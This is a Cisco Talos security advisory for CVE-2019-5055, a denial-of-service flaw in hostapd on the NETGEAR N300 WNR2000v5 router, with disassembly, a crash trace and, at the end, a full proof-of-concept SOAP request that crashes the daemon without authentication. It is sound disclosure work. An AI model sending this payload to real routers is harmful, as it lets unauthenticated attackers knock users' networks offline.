Headline
CVE-2019-5055: TALOS-2019-0832 || Cisco Talos Intelligence Group
An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.
Summary
An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.
Tested Versions
NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70
Product URLs
https://www.netgear.com/support/product/WNR2000v5
CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE
CWE-476: NULL Pointer Dereference
Details
The NETGEAR n300 is a small, affordable wireless router with minimal features.
When a specific SOAP request is sent to the hostapd daemon, web_connection_check_data() calls another function wps_process_msg() with invalid arguments under certain conditions.
0x44e5d4 <web_connection_check_data+2372>: lw a0,20(s1) 0x44e5d8 <web_connection_check_data+2376>: move a1,zero => 0x44e5dc <web_connection_check_data+2380>: jalr t9 // call wps_process_msg() 0x44e5e0 <web_connection_check_data+2384>: move a2,v0
The problem is that there is no validation to determine if M1 data has been received. This is normally performed by the GetDeviceInfo() method:
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"
Content-type: text/xml
Content-Length: 320
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body>.<m:GetDeviceInfo xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">.</m:GetDeviceInfo></SOAP-ENV:Body></SOAP-ENV:Envelope>
This method will populate a structure later passed to wps_process_msg. However, if GetDeviceInfo() has not been called by a client since the daemon started, it will crash when attempting to dereference the structure passed passed to this function.
0044e5d4 lw a0,0x14(s1) // $a0 == 0x00
0044e5d8 clear a1
0044e5dc jalr t9=>wps_process_msg
0044e5e0 _move a2,v0
Crash Information
Program received signal SIGSEGV, Segmentation fault.
0x0043cc7c in ?? ()
0x43cc70 <wps_get_msg+24>: lw t9,-31756(gp)
0x43cc74 <wps_get_msg+28>: jr t9
0x43cc78 <wps_get_msg+32>: nop
=> 0x43cc7c <wps_process_msg>: lw v0,4(a0) // Crash
0x43cc80 <wps_process_msg+4>: lui gp,0x49
0x43cc84 <wps_process_msg+8>: beqz v0,0x43cc94 <wps_process_msg+24>
0x43cc88 <wps_process_msg+12>: addiu gp,gp,6416
0x43cc8c <wps_process_msg+16>: b 0x43cc98 <wps_process_msg+28>
0x43cc90 <wps_process_msg+20>: lw t9,-30984(gp)
peda-mips > x/32xw $a0
0x0: Cannot access memory at address 0x0
peda-mips > bt
#0 0x0043cc7c in wps_process_msg ()
#1 0x0044e5e4 in web_connection_check_data ()
#2 0x004515fc in httpread_read_handler ()
#3 0x00421ff8 in eloop_sock_table_dispatch ()
#4 0x004226ec in eloop_run ()
#5 0x00408068 in main ()
Exploit Proof of Concept
# Send to <router_ip>:49152
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage"
Host: 192.168.1.1:49152
Content-Type: text/xml
Content-Length: 357
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
.<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewInMessage>AAAA</NewInMessage>
.</m:PutMessage>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Timeline
2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release
Discovered by Dave McDaniel of Cisco Talos.